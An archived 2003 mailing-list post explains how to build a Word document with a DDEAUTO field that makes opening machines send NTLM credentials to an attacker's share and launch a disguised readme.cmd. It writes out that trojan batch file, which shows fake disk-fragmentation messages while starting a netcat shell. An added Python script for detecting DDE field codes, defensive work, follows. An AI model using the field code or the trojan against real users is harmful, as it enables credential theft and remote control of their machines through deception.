All,

MS Office has some good hacks that can be worked into a pen test. This particular one works best inside your organization (no firewall between you and your target). All it requires is that a user open or print a Word doc that you created and sent to them, or that you placed somewhere they could open it, maybe on a shared HD for example.

Open a new Word doc. Put some text in it. Place a footer at the bottom (or you can also use the hidden text field), place the cursor somewhere in the hidden text or footer, and hit Ctrl-F9 (inserts a macro). Place this text into the macro, not including the []:

    [ddeauto progman "\\\\ipaddress\\sharename\\readme.cmd"]

The extra \ is an escape character necessary to get the real \ in the macro. Save the doc.

There are two opportunities to get the target machine:

1. NTLM hashes
2. your readme.cmd file

When the target opens/prints the doc, before any sort of messages or warnings are given (see below for why there are no macro warnings given), the target machine will send its NT/W2K/XP credentials (authentication) to the IP address shown above. Now, if you are running SMBREAD (part of L0phtCrack) you can get their NTLM hashes before they get any messages of any sort!!! If they run NTLMv2, no such good luck, as they will send hashes that you cannot use.

When they are successfully authenticated to your share name (use "everybody read" for permissions on the share) they will be prompted for the "progman" program to open the readme.cmd file on your IP address. But they will not see your IP address. Word will pop up a small window with text like "The remote data (readme.cmd) is not accessible. Do you want to start the application progman?". BTW, you could use a SAMBA machine running SMBREAD and point the readme.cmd there. If you name your Trojan file something like readme.cmd, they will probably open it anyway. What you place into the readme.cmd is your option, but I like to use netcat with an open port like below.

If they answer "yes" to the pop-up mentioned above then the file (readme.cmd) will run using their current NT authority. YMMV.

File is readme.cmd:

    @echo off
    echo Checking to see how fragmented your C drive is... please wait
    start /min \\192.168.1.5\testie\nc -dLp 81 -e %comspec%
    echo You have no disk fragmentation problems at this time - OK. Please close this window..

end of readme.cmd

MS has patches for Word 97 & Word 2000, but as in the article below they have problems. One problem is that you can use DDE or DDEAUTO to run the hack, and plain DDE is not trapped by the patch!! If you want some more information, see this URL: http://www.woodyswatch.com/office/archtemplate.asp?v7-n49 BTW, Woody's Office Watch is an excellent source of information and humor regarding the MS Office products.

I figured out the DDE & DDEAUTO before I saw the above article. The macro warning is not triggered by the DDE or DDEAUTO command until the patch is applied. Also, DDE services & progman are default services/programs that exist in NT, W2K & XP. There are other hacks that you can do, such as launch IE with no console attached, pointing to your XSS site!!!

I have patched my Word 97 and am very careful about opening Word docs from unknown sources! I have also disabled DDE services.

BTW, DDE & DDEAUTO can also be used in Excel spreadsheets. I am not certain if MS has patched them. All OLE programs may use DDE services. PPT, Access, ????

Cheers
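A detection-side example, added here and not part of the original post or of any Microsoft or L0phtCrack tooling: a Python triage script that looks for DDE/DDEAUTO field codes of the kind described above. For a .docx it reassembles each field's instruction text from the `<w:instrText>` runs (Word may split a field code across runs, so a naive string search for "DDEAUTO" can miss it); for anything else, such as a Word 97-2003 .doc, it scans the raw bytes in both 8-bit and UTF-16LE form. All inputs are constructed fixtures: a hand-built minimal .docx (not real Word output), a blob that only mimics the text stream of a .doc (no OLE parsing is done), and the documentation address 192.0.2.10 in place of a real share.

```python
"""Triage helper: find DDE / DDEAUTO field codes in Word documents.

Added example, not from the original post. Assumptions: the .docx fixture is a
hand-built minimal package, not real Word output; the "legacy" sample only
mimics the text stream of a Word 97-2003 .doc, and the OLE container itself is
not parsed (raw bytes are scanned instead).
"""
import io
import re
import sys
import zipfile

# DDE field keywords, matched case-insensitively as whole words.
ASCII_DDE_RE = re.compile(rb'\b(DDEAUTO|DDE)\b', re.IGNORECASE)
# The same keywords in UTF-16LE, which Word 97-2003 uses for document text once
# any non-ASCII character is present (pure-ASCII text is stored as 8-bit).
UTF16_DDE_RE = re.compile(
    rb'(?<![A-Za-z]\x00)(D\x00D\x00E\x00(?:A\x00U\x00T\x00O\x00)?)(?![A-Za-z]\x00)',
    re.IGNORECASE)
# OOXML (.docx): a complex field's instruction text sits in <w:instrText> runs,
# which Word may split at any point; the field ends at a fldChar of type "end".
FLD_END_RE = re.compile(rb'<w:fldChar[^>]*w:fldCharType="end"[^>]*>')
INSTR_RE = re.compile(rb'<w:instrText[^>]*>(.*?)</w:instrText>', re.DOTALL)
FLDSIMPLE_RE = re.compile(rb'<w:fldSimple[^>]*\bw:instr="([^"]*)"')
OLE_MAGIC = b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1'   # Word 97-2003 compound file header


def scan_field_text(text: bytes) -> list:
    """Return the DDE keywords (upper-cased) found in a field code or raw text."""
    found = [m.group(1).decode('ascii').upper() for m in ASCII_DDE_RE.finditer(text)]
    found += [m.group(1).decode('utf-16-le').upper() for m in UTF16_DDE_RE.finditer(text)]
    return found


def extract_docx_field_codes(data: bytes) -> list:
    """Reassemble every field instruction string in a .docx package as (part, code)."""
    codes = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not (name.startswith('word/') and name.endswith('.xml')):
                continue
            xml = zf.read(name)
            # Each segment between "end" markers holds at most one complex field,
            # so joining its instrText runs defeats splitting like "DD" + "EAUTO".
            for segment in FLD_END_RE.split(xml):
                code = b''.join(INSTR_RE.findall(segment))
                if code.strip():
                    codes.append((name, code))
            codes += [(name, code) for code in FLDSIMPLE_RE.findall(xml)]
    return codes


def scan_document(data: bytes) -> list:
    """Return [(location, keyword), ...] for every DDE/DDEAUTO field found."""
    if data.startswith(b'PK\x03\x04'):                  # OOXML zip container
        return [(part, kw) for part, code in extract_docx_field_codes(data)
                for kw in scan_field_text(code)]
    # .doc (OLE) or anything else: scan the raw bytes in both encodings.
    return [('raw', kw) for kw in scan_field_text(data)]


# --- constructed fixtures (not real documents) -------------------------------
# Field code in the shape the post describes; 192.0.2.10 is a documentation address.
FIELD_CODE = r'ddeauto progman "\\\\192.0.2.10\\share\\readme.cmd"'


def build_sample_docx(instr_runs, body_text=b'Quarterly report') -> bytes:
    """Hand-build a minimal .docx with one complex field (a fixture, not Word output)."""
    runs = b''.join(b'<w:r><w:instrText>%s</w:instrText></w:r>' % r for r in instr_runs)
    field = b''
    if instr_runs:
        field = (b'<w:r><w:fldChar w:fldCharType="begin"/></w:r>' + runs
                 + b'<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
                 b'<w:r><w:t>placeholder</w:t></w:r>'
                 b'<w:r><w:fldChar w:fldCharType="end"/></w:r>')
    document = (b'<?xml version="1.0" encoding="UTF-8"?>'
                b'<w:document xmlns:w="http://schemas.openxmlformats.org/'
                b'wordprocessingml/2006/main"><w:body><w:p><w:r><w:t>%s</w:t></w:r>'
                b'%s</w:p></w:body></w:document>' % (body_text, field))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('[Content_Types].xml', '<Types/>')   # placeholder, not a valid part
        zf.writestr('word/document.xml', document)
    return buf.getvalue()


def malicious_docx() -> bytes:
    code = FIELD_CODE.encode()
    return build_sample_docx([b' ' + code[:2], code[2:] + b' '])   # "dd" + "eauto ..."


def benign_docx() -> bytes:
    return build_sample_docx([b' HYPERLINK "https://example.com" '],
                             body_text=b'We added the DDE note to section 3')


def legacy_doc_blob() -> bytes:
    """Mimic the UTF-16 text stream of a .doc (0x13/0x14/0x15 delimit a field)."""
    text = 'Hello \x13' + FIELD_CODE + '\x14 \x15'
    return OLE_MAGIC + b'\x00' * 16 + text.encode('utf-16-le')


if __name__ == '__main__':
    if len(sys.argv) > 1:          # scan real files given on the command line
        for path in sys.argv[1:]:
            with open(path, 'rb') as fh:
                print(path, scan_document(fh.read()))
    else:                          # run against the constructed fixtures
        print('malicious docx:', scan_document(malicious_docx()))
        print('benign docx:   ', scan_document(benign_docx()))
        print('legacy blob:   ', scan_document(legacy_doc_blob()))
```

Run it with no arguments to see the three fixtures, or pass file paths to scan real attachments (for example from a mail-gateway quarantine). Only field codes are inspected in the .docx path, so prose that merely mentions "DDE" is not flagged, while the whole-word match avoids hits on words such as "added". Any finding deserves a manual look: a DDE field that names progman, cmd.exe or a UNC path is exactly the pattern the post describes, and the UNC variant also indicates that outbound SMB to the named host should be blocked at the perimeter.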
This archive was generated by hypermail 2b30 : Wed Feb 19 2003 - 13:31:29 PST